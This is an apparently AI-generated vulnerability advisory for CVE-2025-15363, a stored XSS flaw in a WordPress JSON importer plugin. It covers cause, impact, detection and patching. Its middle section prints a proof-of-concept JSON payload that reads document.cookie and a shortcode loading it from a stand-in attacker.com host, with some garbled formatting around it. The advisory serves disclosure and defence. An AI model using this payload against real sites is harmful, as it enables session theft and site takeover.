
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2025-15363 is a Contributor+ Stored Cross-Site Scripting (XSS) vulnerability in the Get Use APIs (json-content-importer) WordPress plugin affecting versions before 2.0.10. The plugin improperly executes imported JSON content, allowing authenticated users with at least Contributor-level access to inject and store malicious scripts under certain server configurations (specifically when PHP's mbstring extension is not installed). It was publicly disclosed on February 25, 2026, and carries a CVSS v3.1 base score of 5.9 (Medium) (WPScan, Red Hat CVE).
The root cause is improper neutralization of input during web page generation (CWE-79). The plugin's [jsoncontentimporter] shortcode fetches and renders JSON from a user-supplied URL without adequately sanitizing or escaping the returned content before outputting it to the page. When PHP's mbstring extension is absent, the plugin's encoding-related safeguards fail, allowing raw JavaScript from the imported JSON to be executed in the browser. An attacker with Contributor access can craft a post containing the shortcode pointing to a malicious JSON file hosted at an attacker-controlled URL; when a privileged user (e.g., an admin) previews or views the post, the stored XSS payload executes in their browser context (WPScan).
Successful exploitation allows a low-privileged authenticated attacker (Contributor role) to execute arbitrary JavaScript in the browser of higher-privileged users such as administrators who preview or view the crafted post. This can lead to session cookie theft, credential harvesting, unauthorized administrative actions (e.g., creating rogue admin accounts, installing malicious plugins), and potential full site compromise. The scope change (S:C in CVSS) reflects that the impact crosses from the contributor's session into the victim's browser context (WPScan, Red Hat CVE).
A proof-of-concept (PoC) is publicly available via WPScan, detailing the exact shortcode and malicious JSON payload required for exploitation. Exploitation requires an authenticated Contributor-level account and the target server must lack the PHP mbstring extension, which limits the attack surface. The EPSS score is approximately 0.029% (0.000290), indicating low predicted exploitation probability in the near term. No in-the-wild exploitation, threat actor attribution, or CISA KEV catalog listing has been reported as of the time of disclosure (WPScan, Red Hat CVE).
mbstring extension (which disables the plugin's encoding safeguards).https://attacker.com/xss.json) with a payload such as:{
"articles": [
{
"title": "alert('XSS Attack! Cookie: ' + document.cookie)",
"author": "Attacker",
"content": "This is a test"
}
]
}[jsoncontentimporter url="https://attacker.com/xss.json" basenode="articles"]
{title} By: {author} {content}
[/jsoncontentimporter]wp-admin/post.php or wp-admin/post-new.php from Contributor accounts containing jsoncontentimporter shortcode with external URLs in the post body; HTTP GET requests from the WordPress server to external/unknown JSON-hosting URLs at post preview time.wp_posts table) for shortcodes referencing external URLs with jsoncontentimporter..json files, particularly triggered during admin post preview actions.Update the Get Use APIs (json-content-importer) WordPress plugin to version 2.0.10 or later, which addresses the improper JSON execution behavior. As a temporary workaround, ensure the PHP mbstring extension is installed on the server, as its presence prevents the vulnerable code path from being triggered. Additionally, restrict Contributor-level user registrations and review existing Contributor accounts for suspicious post drafts containing jsoncontentimporter shortcodes pointing to external URLs (WPScan).
The vulnerability was discovered and responsibly disclosed by security researcher Ahmed Makawi, who submitted it to WPScan. The disclosure was picked up by standard vulnerability aggregators and CVE tracking services shortly after publication. No significant vendor statements beyond the patch release or notable community debate has been observed (WPScan).
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."